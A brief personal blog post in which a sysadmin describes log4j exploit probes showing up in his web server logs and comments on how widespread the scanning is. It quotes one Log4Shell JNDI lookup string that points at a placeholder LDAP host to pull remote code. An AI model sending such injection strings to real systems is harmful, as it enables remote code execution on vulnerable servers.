I guess that there are a lot of busy sysadmins around at the moment. My web logs are full of crud like:

“GET /$%7Bjndi:ldap://123.345.567:789/Exploit%7D”

and much lengthier entries trying to exploit the log4j vulnerability.

In my case (and for this instance) I’m not that bothered because, luckily, I don’t run Apache, or any of its frameworks or the log4j2 java logging library. But the scale of the problem must be huge if the ‘bots are probing non-apache servers. You’d think they would at least check the server software before continuing the attack.

Permanent link to this article: https://baldric.net/2021/12/17/log4j/